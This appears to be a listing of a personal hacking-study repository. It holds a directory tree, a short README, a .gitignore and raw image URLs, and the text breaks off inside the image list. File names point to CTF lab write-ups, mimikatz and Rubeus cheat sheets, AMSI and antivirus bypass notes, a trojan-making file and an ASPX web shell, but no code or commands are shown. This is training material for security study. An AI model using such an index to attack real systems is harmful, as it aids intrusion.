├── .DS_Store
├── .gitignore
├── HackTheBox VM list.xlsx
├── README.md
├── badge
    ├── crto.png
    ├── crtp.png
    ├── ecptxv2.png
    ├── oscp.png
    ├── osep.png
    └── oswp.png
├── img
    ├── 1658482726896.jpg
    ├── 1658538402705.png
    ├── 1658538616187.png
    ├── 1658538796242.png
    ├── 1658539073418.png
    ├── 1658539231023.png
    ├── 1658539331939.png
    ├── 1658539559821.png
    ├── 1658539710862.png
    ├── 1658540407567.png
    ├── 1658541257705.png
    ├── 1658542072298.png
    ├── 1658542667640.png
    ├── 1658542784090.png
    ├── 1658552371913.jpg
    ├── 1658552409755.png
    ├── 1658552739085.png
    ├── 1658553107506.png
    ├── 1658553273601.png
    ├── 1658553789330.png
    ├── 1658553996815.png
    ├── 1658554807580.png
    ├── 1658555294635.png
    ├── 1658572707486.jpg
    ├── 1658573005655.png
    ├── 1658573188786.png
    ├── 1658630696303.jpg
    ├── 1658630832115.png
    ├── 1658630924161.png
    ├── 1658632516852.png
    ├── 1658632812217.png
    ├── 1658632941438.png
    ├── 1658633025442.png
    ├── 1658633304308.png
    ├── 1658633476738.png
    ├── 1658932153519.png
    ├── 1658932380042.png
    ├── 1658932419426.png
    ├── 1658932550271.png
    ├── 1658932670852.png
    ├── 1658932785866.png
    ├── 1658932928033.png
    ├── 1658933165263.png
    ├── 1658933549100.jpg
    ├── 1658933643963.png
    ├── 1658933722166.png
    ├── 1658933892339.png
    ├── 1658934042562.png
    ├── 1658934235146.png
    ├── 1658934538714.png
    ├── 1659082497815.png
    ├── 1659082657504.jpg
    ├── 1659169506031.png
    ├── 1659169588574.png
    ├── 1659169866416.png
    ├── 1659170303386.png
    ├── 1659170372702.png
    ├── 1659170759699.png
    ├── 1659170828579.png
    ├── 1659170892836.png
    ├── 1659175709057.jpg
    ├── 1659175767155.png
    ├── 1659175840055.png
    ├── 1659175909887.png
    ├── 1659175983912.png
    ├── 1659176161323.png
    ├── 1659176212400.png
    ├── 1659177797247.png
    ├── 1659177842792.png
    ├── 1659177954716.png
    ├── 1659178168742.png
    ├── 1659180534594.png
    ├── 1659217567944.png
    ├── 1659217648208.png
    ├── 1659217760830.png
    ├── 1659217855448.png
    ├── 1659217912569.png
    ├── 1659217968185.png
    ├── 1659218159039.png
    ├── 1659218634868.png
    ├── 1659357337265.png
    ├── 1659357364352.png
    ├── 1659357435571.png
    ├── 1659357590470.png
    ├── 1659357912361.png
    ├── 1659357980410.png
    ├── 1659358074280.png
    ├── 1659358203910.png
    ├── 1659358545929.png
    ├── 1659358861805.png
    ├── 1659359527583.png
    ├── 1659359737874.png
    ├── 1659359761134.png
    ├── 1659360052601.png
    ├── 1659360178308.png
    ├── 1659360353310.png
    ├── 1659360533622.png
    ├── 1659360655062.png
    ├── 1659360814520.png
    ├── 1659360875068.png
    ├── 1659361000781.png
    ├── 1659361114221.png
    ├── 1659361297426.png
    ├── 1659361446415.png
    ├── 1659361480402.png
    ├── 1659419949864.jpg
    ├── 1659420422528.jpg
    ├── 1659420904295.jpg
    ├── 1659421732227.jpg
    ├── 1659423150111.jpg
    ├── 1659424785037.jpg
    ├── 1659426375820.jpg
    ├── 1659426578749.jpg
    ├── 1659427501594.jpg
    ├── 1659431283123.jpg
    ├── 1659431589498.jpg
    ├── 1659435231085.jpg
    ├── 1659435432639.jpg
    ├── 1659445159629.png
    ├── 1659445209294.png
    ├── 1659445414283.png
    ├── 1659445495366.png
    ├── 1659445776654.png
    ├── 1659446058619.png
    ├── 1659446150355.png
    ├── 1659446253717.png
    ├── 1659446665900.png
    ├── 1659446748548.png
    ├── 1659447023087.png
    ├── 1659447313147.png
    ├── 1659447399291.png
    ├── 1659515539543.jpg
    ├── 1659515683605.jpg
    ├── 1659515773959.jpg
    ├── 1659516222390.jpg
    ├── 1659518671269.jpg
    ├── 1659519528397.jpg
    ├── 1659519619361.jpg
    ├── 1659519840063.jpg
    ├── 1659520016347.jpg
    ├── 1659520233753.jpg
    ├── 1659580867657.jpg
    ├── 1659580975880.jpg
    ├── 1659581100182.jpg
    ├── 1659593558274.jpg
    ├── 1659593622049.jpg
    ├── 1659594856781.jpg
    ├── 1659595176870.jpg
    ├── 1659606972423.jpg
    ├── 1659607278954.jpg
    ├── 1659607489734.jpg
    ├── 1659607710913.jpg
    ├── 1659668437954.jpg
    ├── 1659668859646.jpg
    ├── 1659670245366.jpg
    ├── 1659681143334.jpg
    ├── 1659681691184.jpg
    ├── 1659693714992.jpg
    ├── 1659771422544.png
    ├── 1659771509846.png
    ├── 1659771687607.png
    ├── 1659771713194.png
    ├── 1659772122017.png
    ├── 1659833457084.png
    ├── 1659833502959.png
    ├── 1659833623409.png
    ├── 1659833659363.png
    ├── 1659833998724.png
    ├── 1659834129257.png
    ├── 1659834205925.png
    ├── 1659834373533.png
    ├── 1659834547953.png
    ├── 1659834594995.png
    ├── 1659835334105.png
    ├── 1659835501447.png
    ├── 1659835587282.png
    ├── 1659835677989.png
    ├── 1659836366440.png
    ├── 1659836422147.png
    ├── 1659837671373.png
    ├── 1659854255296.png
    ├── 1659858729357.png
    ├── 1659858952513.png
    ├── 1659883791874.png
    ├── 1659884133595.png
    ├── 1659884225306.png
    ├── 1659884392247.png
    ├── 1659884555240.png
    ├── 1659946980653.jpg
    ├── 1659949962469.jpg
    ├── 1659955269804.jpg
    ├── 1660092436532.png
    ├── 1660092477880.png
    ├── 1660092522448.png
    ├── 1660092550915.png
    ├── 1660092586556.png
    ├── 1660092620590.png
    ├── 1660092690159.png
    ├── 1660092737039.png
    ├── 1660092778146.png
    ├── 1660119003116.jpg
    ├── 1660119587415.jpg
    ├── 1660121359926.jpg
    ├── 1660177644996.png
    ├── 1660177751965.png
    ├── 1660178346391.jpg
    ├── 1660178409310.png
    ├── 1660178578300.png
    ├── 1660179325582.png
    ├── 1660179399723.png
    ├── 1660179478426.png
    ├── 1660179755965.png
    ├── 1660208864433.jpg
    ├── 1660349494829.png
    ├── 1660349572197.png
    ├── 1660349812805.png
    ├── 1660349927216.png
    ├── 1660349990632.png
    ├── 1660350175707.png
    ├── 1660350337962.png
    ├── 1660350554524.png
    ├── 1660351272613.png
    ├── 1660352025272.png
    ├── 1660352448322.png
    ├── 1660352469858.png
    ├── 1660353939907.png
    ├── 1660354070932.png
    ├── 1660464491655.png
    ├── 1660464594234.png
    ├── 1660465090520.png
    ├── 1660465223854.png
    ├── 1660465318554.png
    ├── 1660465485113.png
    ├── 1660465540679.png
    ├── 1660465703096.png
    ├── 1660465837786.png
    ├── 1660465923328.png
    ├── 1660466024093.png
    ├── 1660466188920.png
    ├── 1660468130664.png
    ├── 1660468802360.png
    ├── 1660469108850.png
    ├── 1660484464732.png
    ├── 1660484646273.png
    ├── 1660484985024.png
    ├── 1660485863234.png
    ├── 1660486344943.png
    ├── 1660521756280.jpg
    ├── 1660521808537.png
    ├── 1660522044250.png
    ├── 1660523683784.png
    ├── 1660524157612.png
    ├── 1660579012429.png
    ├── 1660605692618.png
    ├── 1660605792458.png
    ├── 1660606024001.png
    ├── 1660606276833.png
    ├── 1660607725852.png
    ├── 1660643241183.jpg
    ├── 1660661678470.png
    ├── 1660661925404.png
    ├── 1660663208934.png
    ├── 1660780102416.png
    ├── 1660832489408.png
    ├── 1660832683125.png
    ├── 1660865870549.png
    ├── 1660865963420.png
    ├── 1660866149335.png
    ├── 1660866226722.png
    ├── 1660866323856.png
    ├── 1660866633132.png
    ├── 1660869054791.png
    ├── 1660869206564.png
    ├── 1660955764190.png
    ├── 1660956195011.png
    ├── 1660956339358.png
    ├── 1660956769959.png
    ├── 1660956854183.png
    ├── 1660956941305.png
    ├── 1660957434664.png
    ├── 1660957799421.png
    ├── 1660957846477.png
    ├── 1660957909630.png
    ├── 1660958218908.png
    ├── 1660959095996.png
    ├── 1660959212159.png
    ├── 1661064830268.png
    ├── 1661065278050.png
    ├── 1661066023303.png
    ├── 1661066137416.png
    ├── 1661070978692.png
    ├── 1661071217716.png
    ├── 1661071275240.png
    ├── 1661071431873.png
    ├── 1661071563457.png
    ├── 1661072331977.png
    ├── 1661072540108.png
    ├── 1661073889938.png
    ├── 1661073999207.png
    ├── 1661074307804.png
    ├── 1661074812426.png
    ├── 1661074966539.png
    ├── 1661075200481.png
    ├── 1661075476302.png
    ├── 1661075757675.png
    ├── 1661075843395.png
    ├── 1661075988659.png
    ├── 1661076289590.png
    ├── 1661077999500.png
    ├── 1661079322647.png
    ├── 1661079472601.png
    ├── 1661127998995.png
    ├── 1661128044045.png
    ├── 1661128624021.png
    ├── 1661128651094.png
    ├── 1661128686688.png
    ├── 1661129157072.png
    ├── 1661129314833.png
    ├── 1661129573253.png
    ├── 1661129702198.png
    ├── 1661138983458.jpg
    ├── 1661139561613.jpg
    ├── 1661140052192.jpg
    ├── 1661211307021.png
    ├── 1661211710853.png
    ├── 1661211774204.png
    ├── 1661223583118.jpg
    ├── 1661223640246.jpg
    ├── 1661297512426.png
    ├── 1661297551940.png
    ├── 1661307993881.jpg
    ├── 1661308209479.png
    ├── 1661308247969.jpg
    ├── 1661308329586.jpg
    ├── 1661308385718.png
    ├── 1661308458491.jpg
    ├── 1661308533720.png
    ├── 1661308621315.png
    ├── 1661308836986.jpg
    ├── 1661308876913.jpg
    ├── 1661309056371.png
    ├── 1661333191618.jpg
    ├── 1661333299286.jpg
    ├── 1661333364837.jpg
    ├── 1661333509026.jpg
    ├── 1661407413964.jpg
    ├── 1661470790012.png
    ├── 1661471899909.png
    ├── 1661471925451.png
    ├── 1661472073529.png
    ├── 1661472378476.png
    ├── 1661472458881.png
    ├── 1661472563036.png
    ├── 1661473011405.png
    ├── 1661474217831.png
    ├── 1661474490204.png
    ├── 1661474660596.png
    ├── 1661474867370.png
    ├── 1661474940637.png
    ├── 1661475080201.png
    ├── 1661475846601.png
    ├── 1661476576319.png
    ├── 1661560992096.png
    ├── 1661561839445.png
    ├── 1661562295583.png
    ├── 1661562395882.png
    ├── 1661562642526.png
    ├── 1661562707133.png
    ├── 1661562874980.png
    ├── 1661563194517.png
    ├── 1661563363737.png
    ├── 1661564138404.png
    ├── 1661564792905.png
    ├── 1661565495138.png
    ├── 1661565684266.png
    ├── 1661565817548.png
    ├── 1661565893611.png
    ├── 1661566324482.png
    ├── 1661566440533.png
    ├── 1661676676715.png
    ├── 1661729759471.png
    ├── 1661730058127.png
    ├── 1661731130002.png
    ├── 1661731460113.png
    ├── 1661731798567.png
    ├── 1661732219302.png
    ├── 1661732327423.png
    ├── 1661734556715.png
    ├── 1661734621007.png
    ├── 1661734751787.png
    ├── 1661734876722.png
    ├── 1661819204162.png
    ├── 1661819813711.png
    ├── 1661820029982.png
    ├── 1661820115716.png
    ├── 1661820152793.png
    ├── 1661820202849.png
    ├── 1661820380418.png
    ├── 1661847343109.jpg
    ├── 1661847443739.jpg
    ├── 1661847493243.jpg
    ├── 1661848979858.jpg
    ├── 1661849154274.jpg
    ├── 1661849490832.jpg
    ├── 1661849530241.jpg
    ├── 1661907150811.jpg
    ├── 1661907211822.png
    ├── 1661907257604.png
    ├── 1661992374843.png
    ├── 1661992621622.png
    ├── 1661992677131.png
    ├── 1661992747939.png
    ├── 1661992782518.png
    ├── 1661992886154.png
    ├── 1661992957321.png
    ├── 1667866844266.png
    ├── 1667866940423.png
    ├── 1667867153821.png
    ├── 1667867292305.png
    ├── 1667868683031.png
    ├── 1667869029838.png
    ├── 1667869162364.png
    ├── 1667869606504.png
    ├── 1667869785882.png
    ├── 9a6dad473b19be313e3069da0a2fc937.png
    ├── 9ce41ee1fc282b8dcacd757b23417b12.png
    ├── Brainpan1.png
    ├── Brainpan2.png
    ├── Brainpan3.png
    ├── Brainpan4.png
    ├── Brainpan5.png
    ├── EIP地址.png
    ├── ESP.png
    ├── c3565cf93de4990f41f41b25aed80571.png
    ├── c9113ad0ff443dd0973736552e85aa69.png
    ├── c99038cd6cc9e37512edabb1f873a4da.png
    ├── d2f78ae2b44ef76453a80144dac86b4e.png
    ├── dc5fa3e75ff056f11e16c03373799f45.png
    ├── f7ed25a701cf20ea85cf333b20708ffe.png
    ├── fe703ddea6135e0c867afcc6f61a8cd2.png
    ├── fuzz.png
    ├── shellcode地址.png
    ├── 查找坏字节1.png
    ├── 查找坏字节2.png
    └── 查找坏字节3.png
├── 命令备忘
    ├── .DS_Store
    ├── MSSQL.md
    ├── SMB.md
    ├── bypass相关
    │   ├── Freeze.md
    │   ├── Harriet.md
    │   └── SysWhispers3WinHttp.md
    ├── msfvenom编译.md
    ├── powershell.md
    ├── web爆破.md
    ├── wifi破解.md
    ├── 内网扫描.md
    ├── 密码攻击.md
    ├── 工具
    │   ├── MSF.md
    │   ├── PowerView3.0命令.md
    │   ├── PowerverView2.0命令.md
    │   ├── Rubeus命令.md
    │   ├── bloodhound.md
    │   ├── impacket.md
    │   └── mimikatz命令.md
    ├── 文件传输.md
    ├── 本地权限提升.md
    ├── 本地权限维持.md
    ├── 杂七杂八.md
    ├── 横向移动.md
    ├── 登录.md
    ├── 绕过AMSI和PS执行策略，Anti-AV.md
    └── 转发和隧道.md
├── 提权
    ├── Linux PrivEsc Arena.md
    ├── Linux PrivEsc.md
    ├── Windows PrivEsc Arena.md
    ├── Windows Privesc.md
    ├── linux提权.xmind
    └── 提权工具
    │   └── peass
    │       ├── lin
    │           └── linpeas.sh
    │       └── win
    │           ├── PowerUp.ps1
    │           ├── winPEAS.bat
    │           ├── winPEASx64.exe
    │           └── winPEASx86.exe
├── 杂七杂八
    ├── InsomniaShell.aspx
    ├── PowerShell.md
    ├── img
    │   ├── 1681831089636.jpg
    │   ├── 1681831897783.jpg
    │   ├── 1681832433238.png
    │   ├── 1681832588697.png
    │   ├── 1681832687815.png
    │   ├── 1681832754502.png
    │   ├── 1681832856739.png
    │   └── 1681833225045.png
    ├── naabu
    ├── nmap
    ├── nmap64
    ├── xmind
    │   ├── Burpsite.xmind
    │   ├── MySql注入攻防技术.xmind
    │   ├── Pentesting_Active_directory.xmind
    │   ├── kali Linux.xmind
    │   ├── msf.xmind
    │   ├── web网络安全攻防.xmind
    │   ├── 域渗透中文翻译版.xmind
    │   ├── 提权.xmind
    │   ├── 网络安全训练营.xmind
    │   └── 计算机网络.xmind
    ├── 内网渗透
    │   └── 后渗透阶段.md
    ├── 参考资料
    │   ├── Attacking Active Directory_ 0 to 0.9 _ zer1t0.pdf
    │   ├── OSCP Web专题方法论.pdf
    │   ├── OSCP方法论.pdf
    │   ├── OSEP.md
    │   └── 域渗透一条龙.pdf
    ├── 如何用IPLC加速连接offsec Lab网络.md
    ├── 常用dos.txt
    └── 木马制作.txt
└── 靶场
    ├── .DS_Store
    ├── HTB
        ├── .DS_Store
        ├── Access（runas命令提升权限）.md
        ├── Active（活动目录：Kerberoasting，枚举禁用了Kerberos预认证的用户）.md
        ├── Analytics(环境变量，ubuntu内核提权-CVE-2023-2640).md
        ├── Antique(HP JetDirect打印机，linux用户组提权：lpadmin).md
        ├── Arctic(缺失补丁：MS10-092).md
        ├── Armageddon（DRUPAL7.5,SUID-snap）.md
        ├── Bank(Clear Text Credentials,SUID).md
        ├── Bastard（DRUPAL7.5,烂土豆，MS10-059）.md
        ├── Bastion（挂载vhd文件dump出用户哈希，mRemoteNG配置文件泄露密码信息）.md
        ├── Beep（elastix，LFI+RCE）.md
        ├── Bizness(CVE-2023-51467,ofbiz RCE).md
        ├── Blazorized.md
        ├── Blocky（密码复用）.md
        ├── Blunder（Bludit3.9，暴力枚举，上传漏洞）.md
        ├── Blurry.md
        ├── Blurry_files
        │   └── 1.jpg
        ├── BoardLight.md
        ├── BoardLight_files
        │   ├── 1.jpg
        │   ├── 2.jpg
        │   └── 3.jpg
        ├── Bounty（IIS7.5上传web.config，配置文件写shell）.md
        ├── Broker.md
        ├── Broker_files
        │   └── 1.jpg
        ├── Buff（根据PID找二进制文件，chisel转发内网服务）.md
        ├── Busqueda.md
        ├── Cap（cap文件分析，密码复用，setuid）.md
        ├── Cascade(Clear Text Credentials，AD Recycle Bin组).md
        ├── Chatterbox(icacls命令查看以及操作文件权限).md
        ├── Cicada.md
        ├── Codify(CVE-2023-30547,nodejs沙箱逃逸).md
        ├── Compiled.md
        ├── Compiled_files
        │   ├── 1.jpg
        │   └── 2.jpg
        ├── Cronos（域传送漏洞）.md
        ├── Delivery(Weak Credentials).md
        ├── DevOops（XXE攻击，bash_history，git版本回退）.md
        ├── Devvortex(Joomla RCE,sudo apport-cli).md
        ├── Doctor（模板注入，Splunk）.md
        ├── Editorial.md
        ├── Editorial_files
        │   ├── 1.jpg
        │   ├── 10.jpg
        │   ├── 11.jpg
        │   ├── 12.jpg
        │   ├── 2.jpg
        │   ├── 3.jpg
        │   ├── 4.jpg
        │   ├── 5.jpg
        │   ├── 6.jpg
        │   ├── 7.jpg
        │   ├── 8.jpg
        │   └── 9.jpg
        ├── Endgames
        │   └── P.O.O.md
        ├── Explore（安卓系统，adb调试）.md
        ├── Forest（活动目录：rpcclient收集用户名单，枚举关闭预认证用户，组权限，DCSync）.md
        ├── Fuse（活动目录：cewl收集密码名单，密码喷洒，修改SMB密码，rpcclient信息收集，SeLoadDriverPrivilege）.md
        ├── GreenHorn.md
        ├── GreenHorn_files
        │   ├── 1.jpg
        │   ├── 2.jpg
        │   ├── 3.jpg
        │   ├── 4.jpg
        │   ├── 5.jpg
        │   ├── 6.jpg
        │   └── 7.jpg
        ├── Haircut（反引号命令注入，SUID：screen-4.5.0）.md
        ├── Headless.md
        ├── Headless_files
        │   ├── 1.jpg
        │   ├── 2.jpg
        │   ├── 3.jpg
        │   └── 4.jpg
        ├── Horizontall（vhost爆破，Strapi-CVE-2019-19609，chisel内网转发，Laravel-CVE-2021-3129）.md
        ├── IClean.md
        ├── IClean_files
        │   ├── 1.jpg
        │   ├── 1.png
        │   ├── 2.jpg
        │   └── 3.jpg
        ├── Irked（IRC后门，图片隐写，SUID命令劫持）.md
        ├── Jeeves（jenkins，keepass，哈希传递）.md
        ├── Keeper(putty2ssh).md
        ├── Knife（PHP 8.1.0-dev后门，sudo：knife）.md
        ├── Lantern.md
        ├── Lantern_files
        │   └── 1.jpg
        ├── Late(SSTI).md
        ├── Love(Voting System 1.0,vhost爆破，Registry Escalation).md
        ├── Luanne.md
        ├── Mailing.md
        ├── Mailing_files
        │   ├── 1.jpg
        │   ├── 2.jpg
        │   └── 3.jpg
        ├── Mirai（树莓派默认密码）.md
        ├── MonitorsThree.md
        ├── MonitorsThree_files
        │   ├── 1.jpg
        │   ├── 1.png
        │   ├── 2.jpg
        │   ├── 3.jpg
        │   ├── 4.jpg
        │   ├── 5.jpg
        │   ├── 6.jpg
        │   ├── 7.jpg
        │   ├── 8.jpg
        │   └── 9.jpg
        ├── Nest（windows文件隐写）.md
        ├── Networked(apache多后缀解析漏洞，命令注入).md
        ├── Nibbles（Nibbleblogv4.0.3任意文件上传）.md
        ├── October（SUID Buffer overflow）.md
        ├── OpenAdmin（openNetAdmin 18.1.1，导出带特定字符密码文件）.md
        ├── Perfection.md
        ├── Perfection_files
        │   ├── 1.jpg
        │   ├── 2.jpg
        │   ├── 3.jpg
        │   └── 4.jpg
        ├── PermX.md
        ├── PermX_files
        │   ├── 1.jpg
        │   ├── 2.jpg
        │   ├── 3.jpg
        │   └── 4.jpg
        ├── Poison（LFI+日志毒化，破解vnc密码文件）.md
        ├── Postman（redis修改ssh配置文件，webmin 1.910）.md
        ├── Previse（burp fuzzing，命令劫持）.md
        ├── Ready(升级完整shell，容器逃逸).md
        ├── Remote（umbraco7.12.4 RCE,teamviewer将用户名密码硬编码至注册表）.md
        ├── Resolute（LDAP信息泄露，DnsAdmins组用户权限提升）.md
        ├── Resource.md
        ├── Resource_files
        │   ├── 1.jpg
        │   ├── 1.png
        │   └── 2.jpg
        ├── Return(ldap printer 389).md
        ├── Runner.md
        ├── Runner_files
        │   ├── 1.jpg
        │   └── 2.jpg
        ├── Sau.md
        ├── Sau_files
        │   └── 1.jpg
        ├── Sauna(活动目录，关闭预认证用户，Remote Management Users组成员，DCSync).md
        ├── ScriptKiddie（msfvenom命令注入）.md
        ├── Sea.md
        ├── Sea_files
        │   ├── 1.jpg
        │   ├── 2.jpg
        │   ├── 3.jpg
        │   ├── 4.jpg
        │   ├── 5.jpg
        │   ├── 6.jpg
        │   ├── 7.jpg
        │   └── 8.jpg
        ├── SecNotes(跨站请求伪造攻击(XSRF)).md
        ├── Sense（pfsense RCE）.md
        ├── ServMon（NVMS-10000文件遍历，chisel转发内网服务，windows文件权限）.md
        ├── Shocker（指定扩展名爆破，shellsocker）.md
        ├── Sightless.md
        ├── Sightless_files
        │   ├── 1.jpg
        │   ├── 10.jpg
        │   ├── 2.jpg
        │   ├── 3.jpg
        │   ├── 4.jpg
        │   ├── 5.jpg
        │   ├── 6.jpg
        │   ├── 7.jpg
        │   └── 8.jpg
        ├── SolidState(rbash逃逸).md
        ├── Sunday(79端口finger服务探测用户).md
        ├── SwagShop（Magento1.7.0.2 RCE）.md
        ├── Tabby（LFI+tomcat 9.0.31）.md
        ├── Titanic.md
        ├── Toolbox(sql注入，boot2docker).md
        ├── Traverxec（nostromo 1.9.6，nhttpd.conf）.md
        ├── Trickster.md
        ├── TwoMillion.md
        ├── TwoMillion_files
        │   ├── 1.jpg
        │   ├── 10.jpg
        │   ├── 11.jpg
        │   ├── 2.jpg
        │   ├── 3.jpg
        │   ├── 4.jpg
        │   ├── 5.jpg
        │   ├── 6.jpg
        │   ├── 7.jpg
        │   ├── 8.jpg
        │   └── 9.jpg
        ├── Usage.md
        ├── Usage_files
        │   ├── 1.jpg
        │   └── 2.jpg
        ├── Valentine（心脏滴血漏洞）.md
        ├── Validation（sql注入）.md
        ├── Wifinetic.md
        └── WifineticTwo.md
    ├── TryHackMe
        ├── .DS_Store
        ├── 0day.md
        ├── Alfred.md
        ├── All in One.md
        ├── Anonymous.md
        ├── Anthem.md
        ├── Archangel.md
        ├── AttacktiveDirect.md
        ├── Biohazard.md
        ├── Blog.md
        ├── Blueprint.md
        ├── Boiler CTF.md
        ├── Brainpan.md
        ├── Brute It.md
        ├── Chill Hack.md
        ├── ChocolateFactory.md
        ├── ColddBox.md
        ├── Corp.md
        ├── Cyborg.md
        ├── Daily Bugle.md
        ├── Easy Peasy.md
        ├── Enterprise.md
        ├── FoodCTF.md
        ├── Game Zone.md
        ├── Gaming Server.md
        ├── Gatekeeper.md
        ├── HackPark.md
        ├── Hacker of the Hill.md
        ├── Ice.md
        ├── Ignite VM.md
        ├── Inclusion.md
        ├── Internal.md
        ├── Kenobi.md
        ├── Kerberos Server.md
        ├── LazyAdminFinal.md
        ├── Lian_Yu.md
        ├── Looking Glass.md
        ├── Madness.md
        ├── Mindgames.md
        ├── Mr Robot.md
        ├── Mustacchio.md
        ├── Networks
        │   ├── Breaching Active Directory.md
        │   ├── Credentials Harvesting.md
        │   ├── Enumerating Active Directory.md
        │   ├── Exploiting Active Directory.md
        │   ├── Holo.md
        │   ├── Lateral Movement and Pivoting.md
        │   ├── Persisting Active Directory.md
        │   └── Wreath.md
        ├── Overpass.md
        ├── Pickle Rick.md
        ├── Post-Exploitation Basics.md
        ├── Powershell skills.md
        ├── RazorBlack.md
        ├── Red Team
        │   ├── Red Team OPSEC.md
        │   └── Windows Local Persistence.md
        ├── Relevant.md
        ├── Retro.md
        ├── Roasted.md
        ├── RootMe.md
        ├── Skynet.md
        ├── Smag Grotto.md
        ├── Startup.md
        ├── Steel Mountain.md
        ├── Watcher.md
        ├── Wgel CTF.md
        ├── Wonderland.md
        ├── Year of the Rabbit.md
        ├── Zero Logon.md
        ├── dogcat.md
        └── tomghost.md
    ├── bWAPP.xmind
    ├── burp-web-path
        ├── SSRF(服务端请求伪造).md
        └── Server-side vulnerabilities（服务器端漏洞）.md
    ├── kali.xmind
    ├── pikachu.xmind
    ├── sqli-lab.xmind
    ├── upload-labs.xmind
    ├── xss-labs.xmind
    └── 暗月8.md


/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/.DS_Store


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | /编程/vuex/vuex-demo1/node_modules
2 | /编程/exercism/*.exe
3 | 


--------------------------------------------------------------------------------
/HackTheBox VM list.xlsx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/HackTheBox VM list.xlsx


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # 关于hack的学习记录
2 | 
3 | 记录hack学习中的靶机、思路和方法
4 | 
5 | 
6 | 


--------------------------------------------------------------------------------
/badge/crto.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/badge/crto.png


--------------------------------------------------------------------------------
/badge/crtp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/badge/crtp.png


--------------------------------------------------------------------------------
/badge/ecptxv2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/badge/ecptxv2.png


--------------------------------------------------------------------------------
/badge/oscp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/badge/oscp.png


--------------------------------------------------------------------------------
/badge/osep.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/badge/osep.png


--------------------------------------------------------------------------------
/badge/oswp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/badge/oswp.png


--------------------------------------------------------------------------------
/img/1658482726896.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658482726896.jpg


--------------------------------------------------------------------------------
/img/1658538402705.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658538402705.png


--------------------------------------------------------------------------------
/img/1658538616187.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658538616187.png


--------------------------------------------------------------------------------
/img/1658538796242.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658538796242.png


--------------------------------------------------------------------------------
/img/1658539073418.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658539073418.png


--------------------------------------------------------------------------------
/img/1658539231023.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658539231023.png


--------------------------------------------------------------------------------
/img/1658539331939.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658539331939.png


--------------------------------------------------------------------------------
/img/1658539559821.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658539559821.png


--------------------------------------------------------------------------------
/img/1658539710862.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658539710862.png


--------------------------------------------------------------------------------
/img/1658540407567.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658540407567.png


--------------------------------------------------------------------------------
/img/1658541257705.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658541257705.png


--------------------------------------------------------------------------------
/img/1658542072298.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658542072298.png


--------------------------------------------------------------------------------
/img/1658542667640.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658542667640.png


--------------------------------------------------------------------------------
/img/1658542784090.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658542784090.png


--------------------------------------------------------------------------------
/img/1658552371913.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658552371913.jpg


--------------------------------------------------------------------------------
/img/1658552409755.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658552409755.png


--------------------------------------------------------------------------------
/img/1658552739085.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maxzxc0110/hack-study/ff956de6d1afbb54e43023d9f0a11abbe7967e74/img/1658552739085.png


--------------------------------------------------------------------------------
/img/1658553107506.png:
--------------------------------------------------------------------------------
